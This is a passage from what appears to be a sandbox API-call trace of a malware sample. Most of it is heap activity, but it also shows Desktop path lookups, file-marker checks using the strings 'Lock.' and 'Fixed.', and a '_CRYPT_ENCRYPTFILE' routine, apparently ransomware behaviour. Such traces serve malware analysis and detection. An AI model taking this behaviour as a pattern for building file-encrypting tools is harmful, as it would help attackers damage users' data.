hHeap=0x970000) returned 1 [0205.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0205.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0205.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0205.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0205.191] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0205.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0205.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0205.191] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0205.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0205.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0205.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0205.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0205.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0205.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0205.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0205.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0205.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0205.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0205.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0205.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0205.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0205.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0205.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0205.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0205.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0205.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0205.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0205.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x44) returned 0x2e563a8 [0205.192] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/pGS8H.csv", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\pGS8H.csv", lpFilePart=0x8cf650*="pGS8H.csv") returned 0x21 [0205.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0205.192] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\pGS8H.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\pgs8h.csv")) returned 0xffffffff [0205.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0205.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0205.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0205.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0205.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0205.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0205.192] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0205.192] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.192] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0205.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0205.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0205.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0205.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0205.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0205.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0205.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0205.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0205.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0205.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0205.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0205.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0205.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SafePC_ver1.0.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="afePC_ver1.0.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fePC_ver1.0.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ePC_ver1.0.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PC_ver1.0.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C_ver1.0.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_ver1.0.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ver1.0.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er1.0.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r1.0.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.0.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".0.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0.dll", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0205.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0205.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0205.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0205.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0205.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0205.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0205.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0205.193] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0205.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0205.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0205.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0205.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0205.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0205.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0205.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0205.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0205.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0205.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0205.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0205.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0205.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0205.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0205.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0205.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0205.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0205.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0205.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0205.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SafePC_ver1.0.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="afePC_ver1.0.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fePC_ver1.0.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ePC_ver1.0.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PC_ver1.0.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C_ver1.0.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_ver1.0.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ver1.0.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er1.0.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r1.0.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.0.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".0.dll", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0205.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0205.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0205.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0205.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0205.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0205.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0205.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0205.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0205.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0205.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0205.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0205.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0205.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0205.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0205.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0205.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0205.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0205.195] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0205.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0205.195] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0205.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0205.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0205.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0205.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0205.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0205.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0205.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0205.195] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0205.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0205.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0205.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0205.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0205.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0205.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0205.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0205.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0205.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0205.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0205.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0205.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0205.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0205.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0205.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0205.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0205.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0205.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0205.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0205.196] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0205.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0205.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0205.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0205.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0205.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0205.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0205.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0205.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0205.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0205.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0205.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0205.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0205.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0205.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0205.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b78 [0205.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0205.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0205.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0205.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0205.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b68 [0205.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0205.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0205.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0205.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53848 [0205.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0205.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0205.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0205.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0205.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0205.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0205.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0205.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0205.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0205.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0205.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0205.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0205.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0205.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0205.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0205.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0205.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0205.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0205.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0205.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0205.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0205.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0205.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0205.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0205.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0205.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0205.267] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0205.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0205.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0205.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0205.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0205.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0205.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0205.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0205.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0205.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0205.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0205.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0205.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0205.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0205.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0205.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0205.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0205.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0205.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0205.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0205.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0205.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0205.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0205.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0205.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0205.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 